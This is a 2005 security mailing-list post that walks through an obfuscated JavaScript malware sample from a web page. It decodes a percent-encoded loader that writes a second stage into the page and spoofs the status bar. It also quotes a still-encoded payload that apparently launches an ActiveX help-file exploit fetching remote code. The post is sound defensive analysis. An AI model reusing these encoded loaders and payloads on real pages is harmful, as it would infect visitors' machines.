[Dshield] Help Needed With Dissection of Exploit

Valdis.Kletnieks@vt.edu Valdis.Kletnieks at vt.edu
Wed Aug 10 05:33:43 GMT 2005


On Wed, 10 Aug 2005 14:04:56 +1000, Nemo Omen said:

> 2) I dont know a whole lot about the javascript unescape function what it 
> does?

It cleans up the % escapes

> 3) Are the %codes below machine opcodes or something else?

No, just hex codes - useful for embedding special chars into a URL.

> 4) What are the next steps in analysis of this malware?

Take it statement by statement:

> language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75
%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%
64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%6
2%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D
%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%
29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2
E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C
%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%
28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3
B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73
%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%
74%3E%0D%0A'));

The unescape returns (pretty printed for legibility):

<script language="javascript">
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)
    t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
self.focus();
setInterval("window.status='Google.com'",7);
}
</script>

It's a slightly more sophisticated decoder.  It defines dF, which takes a long
string as a parameter.  First we unescape the whole thing (all the %28 become
'(', and so on). Then the for loop builds a new string, where each ascii char
is the one 3 (the last char in the string) before the input string (so 'd'
becomes 'a', a '0' becomes a '-', and so on), then we unescape it again..  

> dF('%286Fvw%7Coh%286H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286
E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286
Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%28
6FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%28
55%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh
%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH
%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfu
rooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286
G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286
D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%
7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad4
4%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G
%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%28
55%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2
857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853
YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%2
85%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%2
86Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%
288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%28
3%3C%283%3C%283%3C3')

Left as an exersize for the student. ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20050810/f3063c19/attachment.bin


More information about the list mailing list